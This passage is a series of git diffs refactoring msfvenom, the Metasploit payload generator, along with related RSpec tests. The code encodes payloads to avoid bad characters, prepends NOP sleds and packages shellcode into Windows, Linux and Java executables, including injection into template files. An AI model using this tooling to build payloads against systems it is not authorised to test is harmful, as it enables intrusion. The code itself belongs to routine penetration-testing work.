+    init_framework(:module_types => [ ::Msf::MODULE_ENCODER ])
+    tbl = Rex::Ui::Text::Table.new(
+        'Indent'  => 4,
+        'Header'  => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
+        'Columns' =>
+            [
+                "Name",
+                "Rank",
+                "Description"
+            ])
+    cnt = 0
+
+    @framework.encoders.each_module(
+        'Arch' => arch ? arch.split(',') : nil) { |name, mod|
+      tbl << [ name, mod.rank_to_s, mod.new.name ]
+
+      cnt += 1
+    }
+
+    (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n"
+  end
+
+  def dump_nops
+    init_framework(:module_types => [ ::Msf::MODULE_NOP ])
+    tbl = Rex::Ui::Text::Table.new(
+        'Indent'  => 4,
+        'Header'  => "Framework NOPs (#{@framework.stats.num_nops} total)",
+        'Columns' =>
+            [
+                "Name",
+                "Description"
+            ])
+
+    @framework.nops.each_module { |name, mod|
+      tbl << [ name, mod.new.description ]
+    }
+
+    "\n" + tbl.to_s + "\n"
+  end
+
+  def generate_raw_payload
+    if @opts[:payload] == 'stdin'
+      payload_raw = payload_stdin
+      if @opts[:encode] and (@opts[:arch].nil? or @opts[:platform].nil?)
+        print_error("Cannot encode stdin payload without specifying the proper architecture and platform")
+        @opts[:encode] = false
+      end
+      # defaults for stdin payloads users should define them
+      unless @opts[:arch]
+        print_error("Defaulting to x86 architecture for stdin payload, use -a to change")
+        @opts[:arch] = "x86"
+      end
+      unless @opts[:platform]
+        print_error("Defaulting to Windows platform for stdin payload, use --platform to change")
+        @opts[:platform] = ::Msf::Module::PlatformList.transform("Windows")
+      end
+    else
+      payload = @framework.payloads.create(@opts[:payload])
+      if payload.nil?
+        print_error("Invalid payload: #{@opts[:payload]}")
+        exit
+      end
+      if @opts[:list_options]
+        print_status("Options for #{payload.fullname}\n\n" +
+           ::Msf::Serializer::ReadableText.dump_module(payload,'    '))
+        exit
+      end
+      @opts[:arch]     ||= payload.arch[0]
+      # If it's not stdin, we'll already have a PlatformList
+      @opts[:platform] ||= payload.platform
+      payload.datastore.merge! @datastore
+      payload_raw = payload.generate_simple(
+        'Format'   => 'raw',
+        'Options'  => @datastore,
+        'Encoder'  => nil)
+    end
+
+    payload_raw
+  end
+
+
+  def generate
+    if @opts[:list]
+      @opts[:list].each do |mod|
+        case mod.downcase
+        when "payloads"
+          $stderr.puts dump_payloads
+        when "encoders"
+          $stderr.puts dump_encoders(@opts[:arch])
+        when "nops"
+          $stderr.puts dump_nops
+        when "all"
+          # Init here so #dump_payloads doesn't create a framework with
+          # only payloads, etc.
+          init_framework
+          $stderr.puts dump_payloads
+          $stderr.puts dump_encoders
+          $stderr.puts dump_nops
+        else
+          print_error("Invalid module type")
+        end
+      end
+      exit
+    end
+
+    # Normalize the options
+    @opts[:platform] = ::Msf::Module::PlatformList.transform(@opts[:platform]) if @opts[:platform]
+    @opts[:badchars] = Rex::Text.hex_to_raw(@opts[:badchars])                if @opts[:badchars]
+    @opts[:format]   ||= 'ruby'
+    @opts[:encoder]  ||= nil
+    @opts[:encode]   ||= !(@opts[:badchars].nil? or @opts[:badchars].empty?)
+
+
+    init_framework
+    payload_raw = generate_raw_payload
+
+    if @opts[:template]
+      unless File.exist?(@opts[:template])
+        raise NoTemplateError, "Template file (#{@opts[:template]}) does not exist"
+      end
+      path = File.dirname(@opts[:template])
+      altexe = File.basename(@opts[:template])
+    end
+    exeopts = { :inject => @opts[:inject], :template_path => path, :template => altexe }
+
+    # If we were given addshellcode for a win32 payload,
+    # create a double-payload; one running in one thread, one running in the other
+    if @opts[:addshellcode] and @opts[:platform].platforms.include?(::Msf::Module::Platform::Windows) and @opts[:arch] == 'x86'
+      payload_raw = ::Msf::Util::EXE.win32_rwx_exec_thread(payload_raw,0,'end')
+      file = ::File.new(@opts[:addshellcode])
+      file.binmode
+      payload_raw << file.read
+      file.close
+    end
+
+    if @opts[:encode]
+      done = false
+      encoders = get_encoders(@opts[:arch], @opts[:encoder])
+      encoders.each do |enc|
+        next if not enc
+        begin
+          break if done
+          enc.datastore.import_options_from_hash(@datastore)
+          skip = false
+          raw = nil
+
+          @opts[:iterations] ||= 1
+
+          1.upto(@opts[:iterations].to_i) do |iteration|
+            begin
+              raw = enc.encode(payload_raw.dup, @opts[:badchars], nil, @opts[:platform])
+            rescue ::Msf::EncodingError
+              print_error("#{enc.refname} failed: #{$!.class} : #{$!}")
+              skip = true
+              break
+            end
+            if @opts[:space] and @opts[:space] > 0 and raw.length > @opts[:space]
+              print_error("#{enc.refname} created buffer that is too big (#{raw.length})\n\n")
+              skip = true
+              break
+            end
+
+            print_status("#{enc.refname} succeeded with size #{raw.length} (iteration=#{iteration})\n")
+            payload_raw = raw.dup
+            if iteration == @opts[:iterations]
+              done = true
+              break
+            end
+          end
+          next if skip
+
+        rescue ::Errno::ENOENT, ::Errno::EINVAL
+          print_error("#{enc.refname} failed: #{$!}")
+          break
+
+        rescue => e
+          print_error("#{enc.refname} failed: #{e.class} #{e}")
+          e.backtrace.each { |el|
+            $stderr.puts(el.to_s)
+          }
+        end
+      end
+    end
+
+    if @opts[:nopsled]
+      #puts @opts[:arch].class
+      nopts = { 'BadChars' => @opts[:badchars] }
+      nops = generate_nops([@opts[:arch]], @opts[:nopsled], nil, nopts)
+      payload_raw = nops + payload_raw
+    end
+
+    $stdout.binmode
+
+    case @opts[:format].downcase
+    # Special-case this to check endianness
+    when "js_be"
+
+      if Rex::Arch.endian(payload.arch) != ENDIAN_BIG
+          print_error("Big endian format selected for a non big endian payload")
+          exit
+      end
+      $stdout.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+
+    # Special-case this so we can build a war directly from the payload if
+    # possible
+    when "war"
+      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      if (!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
+        exe = payload.generate_war.pack
+      else
+        exe = ::Msf::Util::EXE.to_jsp_war(exe)
+      end
+      $stdout.write exe
+
+    # Same as war, special-case this so we can build a jar directly from the
+    # payload if possible
+    when "java"
+      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      if(!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
+        exe = payload.generate_jar.pack
+      end
+      if exe
+        $stdout.write exe
+      else
+        print_error("Could not generate payload format")
+      end
+
+    when *::Msf::Simple::Buffer.transform_formats
+      $stdout.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+
+    when *::Msf::Util::EXE.to_executable_fmt_formats
+      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      if exe.nil?
+        print_error("This format does not support that platform/architecture")
+        exit
+      end
+      $stdout.write exe
+
+    else
+      print_error("Unsupported format")
+      exit
+    end
+  end
 end
 
-if opts[:payload]
-	if opts[:payload] == 'stdin'
-		payload_raw = payload_stdin
-		if opts[:encode] and (opts[:arch].nil? or opts[:platform].nil?)
-			print_error("Cannot encode stdin payload without specifying the proper architecture and platform")
-			opts[:encode] = false
-		end
-	else
-		payload = $framework.payloads.create(opts[:payload])
-		if payload.nil?
-			print_error("Invalid payload: #{opts[:payload]}")
-			exit
-		end
-		payload.datastore.merge! datastore
-	end
+
+if __FILE__ == $0
+  begin
+    venom = MsfVenom.new
+    venom.parse_args(ARGV)
+    venom.generate
+  rescue MsfVenom::MsfVenomError => e
+    $stderr.puts e.message
+    exit(-1)
+  end
 end
-
-# Normalize the options
-opts[:platform] = Msf::Module::PlatformList.transform(opts[:platform]) if opts[:platform]
-opts[:badchars] = Rex::Text.hex_to_raw(opts[:badchars])                if opts[:badchars]
-
-# set the defaults unless something is already set by the user
-if opts[:payload] != 'stdin'
-	opts[:arch]     ||= payload.arch[0]
-	# If it's not stdin, we'll already have a PlatfromList
-	opts[:platform] ||= payload.platform
-else
-	# defaults for stdin payloads users should define them
-	unless opts[:arch]
-		print_error("Defaulting to x86 architecture for stdin payload, use -a to change")
-		opts[:arch] = "x86"
-	end
-	unless opts[:platform]
-		print_error("Defaulting to Windows platform for stdin payload, use --platform to change")
-		opts[:platform] = Msf::Module::PlatformList.transform("Windows")
-	end
-end
-
-# After this point, we will have set a platform, even if it's wrong.
-
-opts[:format]   ||= 'ruby'
-opts[:encoder]  ||= nil
-opts[:encode]   ||= !(opts[:badchars].nil? or opts[:badchars].empty?)
-
-if opts[:encoder].nil?
-	fmt = 'raw'
-else
-	fmt =  'raw'
-	encoders = get_encoders(opts[:arch], opts[:encoder])
-end
-
-if opts[:list_options]
-    puts Msf::Serializer::ReadableText.dump_module(payload)
-    exit
-end
-
-if payload_raw.nil? or payload_raw.empty?
-	begin
-		payload_raw = payload.generate_simple(
-				'Format'        => fmt,
-				'Options'       => datastore,
-				'Encoder'       => nil)
-	rescue
-		$stderr.puts "Error generating payload: #{$!}"
-		exit
-	end
-end
-
-if opts[:template]
-	path = File.dirname(opts[:template])
-	altexe = File.basename(opts[:template])
-end
-exeopts = { :inject => opts[:inject], :template_path => path, :template => altexe }
-
-# If we were given addshellcode for a win32 payload,
-# create a double-payload; one running in one thread, one running in the other
-if opts[:addshellcode] and opts[:platform].platforms.include?(Msf::Module::Platform::Windows) and opts[:arch] == 'x86'
-	payload_raw = Msf::Util::EXE.win32_rwx_exec_thread(payload_raw,0,'end')
-	file = ::File.new(opts[:addshellcode])
-	file.binmode
-	payload_raw << file.read
-	file.close
-end
-
-if opts[:encode]
-	done = false
-	encoders = get_encoders(opts[:arch], opts[:encoder])
-	encoders.each do |enc|
-		next if not enc
-		begin
-			break if done
-			enc.datastore.import_options_from_hash(datastore)
-			skip = false
-			raw = nil
-
-			if not opts[:iterations]
-				opts[:iterations] = 1
-			end
-
-			1.upto(opts[:iterations].to_i) do |iteration|
-					begin
-						raw = enc.encode(payload_raw.dup, opts[:badchars], nil, opts[:platform])
-					rescue Msf::EncodingError
-						print_error("#{enc.refname} failed: #{$!.class} : #{$!}")
-						skip = true
-						break
-					end
-					if opts[:space] and opts[:space] > 0 and raw.length > opts[:space]
-						print_error("#{enc.refname} created buffer that is too big (#{raw.length})\n\n")
-						skip = true
-						break
-					end
-
-					print_status("#{enc.refname} succeeded with size #{raw.length} (iteration=#{iteration})\n")
-					payload_raw = raw.dup
-					if iteration == opts[:iterations]
-						done = true
-						break
-					end
-			end
-			next if skip
-
-		rescue ::Errno::ENOENT, ::Errno::EINVAL
-			print_error("#{enc.refname} failed: #{$!}")
-			break
-
-		rescue => e
-			print_error("#{enc.refname} failed: #{e.class} #{e}")
-			e.backtrace.each { |el|
-			$stderr.puts(el.to_s)
-			}
-		end
-	end
-end
-
-if opts[:nopsled]
-	#puts opts[:arch].class
-	nopts = { 'BadChars' => opts[:badchars] }
-	nops = generate_nops([opts[:arch]], opts[:nopsled], nil, nopts)
-	payload_raw = nops + payload_raw
-end
-
-$stdout.binmode
-
-case opts[:format].downcase
-# Special-case this to check endianness
-when "js_be"
-
-	if Rex::Arch.endian(payload.arch) != ENDIAN_BIG
-		print_error("Big endian format selected for a non big endian payload")
-		exit
-	end
-	$stdout.write Msf::Simple::Buffer.transform(payload_raw, opts[:format])
-
-# Special-case this so we can build a war directly from the payload if
-# possible
-when "war"
-	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
-	if (!exe and payload.platform.platforms.index(Msf::Module::Platform::Java))
-		exe = payload.generate_war.pack
-	else
-		exe = Msf::Util::EXE.to_jsp_war(exe)
-	end
-	$stdout.write exe
-
-# Same as war, special-case this so we can build a jar directly from the
-# payload if possible
-when "java"
-	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
-	if(!exe and payload.platform.platforms.index(Msf::Module::Platform::Java))
-		exe = payload.generate_jar.pack
-	end
-	if exe
-		$stdout.write exe
-	else
-		print_error("Could not generate payload format")
-	end
-
-when *Msf::Simple::Buffer.transform_formats
-	$stdout.write Msf::Simple::Buffer.transform(payload_raw, opts[:format])
-
-when *Msf::Util::EXE.to_executable_fmt_formats
-	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
-	if exe.nil?
-		print_error("This format does not support that platform/architecture")
-		exit
-	end
-	$stdout.write exe
-
-else
-	print_error("Unsupported format")
-	exit
-end
-
-

--- a/msfvenom
+++ b/msfvenom
@@ -314,15 +314,15 @@ class MsfVenom
       if payload.nil?
         raise UsageError, "Invalid payload: #{@opts[:payload]}"
       end
+      @opts[:arch]     ||= payload.arch[0]
+      # If it's not stdin, we'll already have a PlatformList
+      @opts[:platform] ||= payload.platform
+      payload.datastore.merge! @datastore
       if @opts[:list_options]
         print_status("Options for #{payload.fullname}\n\n" +
            ::Msf::Serializer::ReadableText.dump_module(payload,'    '))
         return
       end
-      @opts[:arch]     ||= payload.arch[0]
-      # If it's not stdin, we'll already have a PlatformList
-      @opts[:platform] ||= payload.platform
-      payload.datastore.merge! @datastore
       payload_raw = payload.generate_simple(
         'Format'   => 'raw',
         'Options'  => @datastore,

--- a/msfvenom
+++ b/msfvenom
@@ -474,7 +474,7 @@ if __FILE__ == $0
     venom = MsfVenom.new
     venom.parse_args(ARGV)
     venom.generate
-  rescue MsfVenom::MsfVenomError => e
+  rescue MsfVenom::MsfVenomError, Msf::OptionValidateError => e
     $stderr.puts e.message
     exit(-1)
   end

--- a/msfvenom
+++ b/msfvenom
@@ -20,18 +20,33 @@ class MsfVenom
   class MsfVenomError < StandardError; end
   class UsageError < MsfVenomError; end
   class NoTemplateError < MsfVenomError; end
+  class IncompatibleError < MsfVenomError; end
 
   Status = "[*] "
   Error = "[-] "
 
   require 'optparse'
 
+  def initialize(in_stream=$stdin, out_stream=$stdout, err_stream=$stderr, framework=nil)
+    @in = in_stream
+    @out = out_stream
+    @err = err_stream
+    @framework = framework
+  end
+
   def init_framework(create_opts={})
-    return @framework if @framework
     create_opts[:module_types] ||= [
       ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
     ]
     @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
+  end
+
+  def framework
+    return @framework if @framework
+
+    init_framework
+
+    @framework
   end
 
   def parse_args(args)
@@ -42,7 +57,7 @@ class MsfVenom
     opt.separator('')
     opt.separator('Options:')
 
-    opt.on('-p', '--payload    [payload]', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
+    opt.on('-p', '--payload    <payload>', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
       if p == '-'
         @opts[:payload] = 'stdin'
       else
@@ -57,11 +72,11 @@ class MsfVenom
       @opts[:list] = l
     end
 
-    opt.on('-n', '--nopsled    [length]', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
+    opt.on('-n', '--nopsled    <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
       @opts[:nopsled] = n.to_i
     end
 
-    opt.on('-f', '--format     [format]', String, "Output format (use --help-formats for a list)") do |f|
+    opt.on('-f', '--format     <format>', String, "Output format (use --help-formats for a list)") do |f|
       @opts[:format] = f
     end
 
@@ -70,31 +85,31 @@ class MsfVenom
       @opts[:encoder] = e
     end
 
-    opt.on('-a', '--arch       [architecture]', String, 'The architecture to use') do |a|
+    opt.on('-a', '--arch       <architecture>', String, 'The architecture to use') do |a|
       @opts[:arch] = a
     end
 
-    opt.on('--platform   [platform]', String, 'The platform of the payload') do |l|
+    opt.on('--platform   <platform>', String, 'The platform of the payload') do |l|
       @opts[:platform] = l
     end
 
-    opt.on('-s', '--space      [length]', Integer, 'The maximum size of the resulting payload') do |s|
+    opt.on('-s', '--space      <length>', Integer, 'The maximum size of the resulting payload') do |s|
       @opts[:space] = s
     end
 
-    opt.on('-b', '--bad-chars  [list] ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
+    opt.on('-b', '--bad-chars  <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
       @opts[:badchars] = b
     end
 
-    opt.on('-i', '--iterations [count] ', Integer, 'The number of times to encode the payload') do |i|
+    opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i|
       @opts[:iterations] = i
     end
 
-    opt.on('-c', '--add-code   [path] ', String, 'Specify an additional win32 shellcode file to include') do |x|
+    opt.on('-c', '--add-code   <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
       @opts[:addshellcode] = x
     end
 
-    opt.on('-x', '--template   [path] ', String, 'Specify a custom executable file to use as a template') do |x|
+    opt.on('-x', '--template   <path>', String, 'Specify a custom executable file to use as a template') do |x|
       @opts[:template] = x
     end
 
@@ -120,12 +135,11 @@ class MsfVenom
     end
 
     begin
-      opt.parse!
+      opt.parse!(args)
     rescue OptionParser::InvalidOption => e
-      p e
       raise UsageError, "Invalid option\n#{opt}"
     rescue OptionParser::MissingArgument => e
-      p e
+      raise UsageError, "Missing required argument for option\n#{opt}"
     end
 
     if @opts.empty?
@@ -145,20 +159,20 @@ class MsfVenom
   end
 
   def print_status(msg)
-    $stderr.puts(Status + msg)
+    @err.puts(Status + msg)
   end
 
   def print_error(msg)
-    $stderr.puts(Error + msg)
+    @err.puts(Error + msg)
   end
 
   def get_encoders(arch, encoder)
     encoders = []
 
     if (encoder)
-      encoders << @framework.encoders.create(encoder)
+      encoders << framework.encoders.create(encoder)
     else
-      @framework.encoders.each_module_ranked(
+      framework.encoders.each_module_ranked(
           'Arch' => arch ? arch.split(',') : nil) { |name, mod|
         encoders << mod.new
       }
@@ -168,8 +182,8 @@ class MsfVenom
   end
 
   def payload_stdin
-    $stdin.binmode
-    payload = $stdin.read
+    @in.binmode
+    payload = @in.read
     payload
   end
 
@@ -178,14 +192,14 @@ class MsfVenom
     nop_jpts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
 
     if nop_mod
-      nop = @framework.nops.create(nop_mod)
+      nop = framework.nops.create(nop_mod)
       raw = nop.generate_sled(len, nop_opts)
       return raw if raw
     end
 
-    @framework.nops.each_module_ranked('Arch' => arch) do |name, mod|
+    framework.nops.each_module_ranked('Arch' => arch) do |name, mod|
       begin
-        nop = @framework.nops.create(name)
+        nop = framework.nops.create(name)
         raw = nop.generate_sled(len, nop_opts)
         return raw if raw
       rescue
@@ -198,14 +212,14 @@ class MsfVenom
     init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ])
     tbl = Rex::Ui::Text::Table.new(
         'Indent'  => 4,
-        'Header'  => "Framework Payloads (#{@framework.stats.num_payloads} total)",
+        'Header'  => "Framework Payloads (#{framework.stats.num_payloads} total)",
         'Columns' =>
             [
                 "Name",
                 "Description"
             ])
 
-    @framework.payloads.each_module { |name, mod|
+    framework.payloads.each_module { |name, mod|
       tbl << [ name, mod.new.description ]
     }
 
@@ -225,7 +239,7 @@ class MsfVenom
             ])
     cnt = 0
 
-    @framework.encoders.each_module(
+    framework.encoders.each_module(
         'Arch' => arch ? arch.split(',') : nil) { |name, mod|
       tbl << [ name, mod.rank_to_s, mod.new.name ]
 
@@ -239,14 +253,14 @@ class MsfVenom
     init_framework(:module_types => [ ::Msf::MODULE_NOP ])
     tbl = Rex::Ui::Text::Table.new(
         'Indent'  => 4,
-        'Header'  => "Framework NOPs (#{@framework.stats.num_nops} total)",
+        'Header'  => "Framework NOPs (#{framework.stats.num_nops} total)",
         'Columns' =>
             [
                 "Name",
                 "Description"
             ])
 
-    @framework.nops.each_module { |name, mod|
+    framework.nops.each_module { |name, mod|
       tbl << [ name, mod.new.description ]
     }
 
@@ -270,15 +284,14 @@ class MsfVenom
         @opts[:platform] = ::Msf::Module::PlatformList.transform("Windows")
       end
     else
-      payload = @framework.payloads.create(@opts[:payload])
+      payload = framework.payloads.create(@opts[:payload])
       if payload.nil?
-        print_error("Invalid payload: #{@opts[:payload]}")
-        exit
+        raise UsageError, "Invalid payload: #{@opts[:payload]}"
       end
       if @opts[:list_options]
         print_status("Options for #{payload.fullname}\n\n" +
            ::Msf::Serializer::ReadableText.dump_module(payload,'    '))
-        exit
+        return
       end
       @opts[:arch]     ||= payload.arch[0]
       # If it's not stdin, we'll already have a PlatformList
@@ -299,23 +312,23 @@ class MsfVenom
       @opts[:list].each do |mod|
         case mod.downcase
         when "payloads"
-          $stderr.puts dump_payloads
+          @err.puts dump_payloads
         when "encoders"
-          $stderr.puts dump_encoders(@opts[:arch])
+          @err.puts dump_encoders(@opts[:arch])
         when "nops"
-          $stderr.puts dump_nops
+          @err.puts dump_nops
         when "all"
           # Init here so #dump_payloads doesn't create a framework with
           # only payloads, etc.
           init_framework
-          $stderr.puts dump_payloads
-          $stderr.puts dump_encoders
-          $stderr.puts dump_nops
+          @err.puts dump_payloads
+          @err.puts dump_encoders
+          @err.puts dump_nops
         else
           print_error("Invalid module type")
         end
       end
-      exit
+      return
     end
 
     # Normalize the options
@@ -326,7 +339,6 @@ class MsfVenom
     @opts[:encode]   ||= !(@opts[:badchars].nil? or @opts[:badchars].empty?)
 
 
-    init_framework
     payload_raw = generate_raw_payload
 
     if @opts[:template]
@@ -391,69 +403,66 @@ class MsfVenom
         rescue => e
           print_error("#{enc.refname} failed: #{e.class} #{e}")
           e.backtrace.each { |el|
-            $stderr.puts(el.to_s)
+            @err.puts(el.to_s)
           }
         end
       end
     end
 
     if @opts[:nopsled]
-      #puts @opts[:arch].class
       nopts = { 'BadChars' => @opts[:badchars] }
       nops = generate_nops([@opts[:arch]], @opts[:nopsled], nil, nopts)
       payload_raw = nops + payload_raw
     end
 
-    $stdout.binmode
+    @out.binmode
 
     case @opts[:format].downcase
     # Special-case this to check endianness
     when "js_be"
 
       if Rex::Arch.endian(payload.arch) != ENDIAN_BIG
-          print_error("Big endian format selected for a non big endian payload")
-          exit
+          raise IncompatibleError, "Big endian format selected for a non big endian payload"
       end
-      $stdout.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+      @out.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
 
     # Special-case this so we can build a war directly from the payload if
     # possible
     when "war"
-      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
       if (!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
         exe = payload.generate_war.pack
       else
         exe = ::Msf::Util::EXE.to_jsp_war(exe)
       end
-      $stdout.write exe
+      @out.write exe
 
     # Same as war, special-case this so we can build a jar directly from the
     # payload if possible
     when "java"
-      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
       if(!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
         exe = payload.generate_jar.pack
       end
       if exe
-        $stdout.write exe
+        @out.write exe
       else
         print_error("Could not generate payload format")
       end
 
     when *::Msf::Simple::Buffer.transform_formats
-      $stdout.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+      @out.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
 
     when *::Msf::Util::EXE.to_executable_fmt_formats
-      exe = ::Msf::Util::EXE.to_executable_fmt(@framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
+      exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
       if exe.nil?
-        print_error("This format does not support that platform/architecture")
-        exit
+        raise IncompatibleError, "This format does not support that platform/architecture"
       end
-      $stdout.write exe
+      @out.write exe
 
     else
-      print_error("Unsupported format")
-      exit
+      raise IncompatibleError, "Unsupported format"
+      return
     end
   end
 end

--- a/msfvenom
+++ b/msfvenom
@@ -430,7 +430,7 @@ class MsfVenom
     # possible
     when "war"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if (!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
+      if (!exe && payload.respond_to?(:generate_war))
         exe = payload.generate_war.pack
       else
         exe = ::Msf::Util::EXE.to_jsp_war(exe)
@@ -441,7 +441,7 @@ class MsfVenom
     # payload if possible
     when "java"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if(!exe and payload.platform.platforms.index(::Msf::Module::Platform::Java))
+      if (!exe && payload.respond_to?(:generate_jar))
         exe = payload.generate_jar.pack
       end
       if exe
@@ -451,7 +451,8 @@ class MsfVenom
       end
 
     when *::Msf::Simple::Buffer.transform_formats
-      @out.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+      buf = ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format])
+      @out.write buf
 
     when *::Msf::Util::EXE.to_executable_fmt_formats
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)

--- a/msfvenom
+++ b/msfvenom
@@ -318,6 +318,7 @@ class MsfVenom
       # If it's not stdin, we'll already have a PlatformList
       @opts[:platform] ||= payload.platform
       payload.datastore.merge! @datastore
+
       if @opts[:list_options]
         print_status("Options for #{payload.fullname}\n\n" +
            ::Msf::Serializer::ReadableText.dump_module(payload,'    '))

--- a/spec/lib/msf/util/exe_spec.rb
+++ b/spec/lib/msf/util/exe_spec.rb
@@ -4,6 +4,8 @@ require 'msf/core'
 require 'msf/base/simple'
 require 'spec_helper'
 
+require 'support/shared/contexts/msf/util/exe'
+
 describe Msf::Util::EXE do
 
   subject do

--- a/spec/lib/msf/util/exe_spec.rb
+++ b/spec/lib/msf/util/exe_spec.rb
@@ -14,7 +14,14 @@ describe Msf::Util::EXE do
     'DisableDatabase' => true
   )
 
-  context '.to_executable_fmt' do
+  describe '.win32_rwx_exec' do
+    it "should contain the shellcode" do
+      bin = subject.win32_rwx_exec("asdfjklASDFJKL")
+      bin.should include("asdfjklASDFJKL")
+    end
+  end
+
+  describe '.to_executable_fmt' do
     it "should output nil when given a bogus format" do
       bin = subject.to_executable_fmt($framework, "", "", "", "does not exist", {})
 
@@ -28,14 +35,17 @@ describe Msf::Util::EXE do
         { :format => "exe",       :arch => "x86", :file_fp => /PE32 /  },
         { :format => "exe",       :arch => "x64", :file_fp => /PE32\+/ },
         { :format => "exe-small", :arch => "x86", :file_fp => /PE32 /  },
+        { :format => "exe-only",  :arch => "x86", :file_fp => /PE32 /  },
         # No template for 64-bit exe-small. That's fine, we probably
         # don't need one.
         #{ :format => "exe-small", :arch => "x64", :file_fp => /PE32\+/ },
       ],
       "linux" => [
-        { :format => "elf", :arch => "x86",  :file_fp => /ELF 32.*SYSV/ },
-        { :format => "elf", :arch => "x64",  :file_fp => /ELF 64.*SYSV/ },
-        { :format => "elf", :arch => "armle",:file_fp => /ELF 32.*ARM/, :pending => true },
+        { :format => "elf", :arch => "x86",    :file_fp => /ELF 32.*SYSV/ },
+        { :format => "elf", :arch => "x64",    :file_fp => /ELF 64.*SYSV/ },
+        { :format => "elf", :arch => "armle",  :file_fp => /ELF 32.*ARM/ },
+        { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ },
+        { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ },
       ],
       "bsd" => [
         { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ },

--- a/spec/lib/msf/util/exe_spec.rb
+++ b/spec/lib/msf/util/exe_spec.rb
@@ -35,10 +35,11 @@ describe Msf::Util::EXE do
         { :format => "exe",       :arch => "x86", :file_fp => /PE32 /  },
         { :format => "exe",       :arch => "x64", :file_fp => /PE32\+/ },
         { :format => "exe-small", :arch => "x86", :file_fp => /PE32 /  },
-        { :format => "exe-only",  :arch => "x86", :file_fp => /PE32 /  },
         # No template for 64-bit exe-small. That's fine, we probably
         # don't need one.
         #{ :format => "exe-small", :arch => "x64", :file_fp => /PE32\+/ },
+        { :format => "exe-only",  :arch => "x86", :file_fp => /PE32 /  },
+        { :format => "exe-only",  :arch => "x64", :file_fp => /PE32\+ /  },
       ],
       "linux" => [
         { :format => "elf", :arch => "x86",    :file_fp => /ELF 32.*SYSV/ },
@@ -75,6 +76,11 @@ describe Msf::Util::EXE do
           bin = subject.to_executable_fmt($framework, "asdf", platform, "\xcc", formats.first[:format], {})
           bin.should == nil
         end
+        [ ARCH_X86, ARCH_X64, ARCH_X86_64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE ].each do |arch|
+          it "returns nil when given bogus format for arch=#{arch}" do
+            bin = subject.to_executable_fmt($framework, arch, platform, "\xcc", "asdf", {})
+          end
+        end
 
         formats.each do |format_hash|
           fmt   = format_hash[:format]
@@ -95,11 +101,6 @@ describe Msf::Util::EXE do
             fp = f.read
             f.close
             fp.should =~ format_hash[:file_fp] if format_hash[:file_fp]
-          end
-
-          it "returns nil when given bogus format for arch=#{arch}" do
-            bin = subject.to_executable_fmt($framework, arch, platform, "\xcc", "asdf", {})
-            bin.should == nil
           end
 
         end

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -42,7 +42,19 @@ describe MsfVenom do
 				generic/none
 				x86/shikata_ga_nai
 				x64/xor
-				php/base64
+			!.each do |name|
+				dump.should include(name)
+			end
+		end
+	end
+
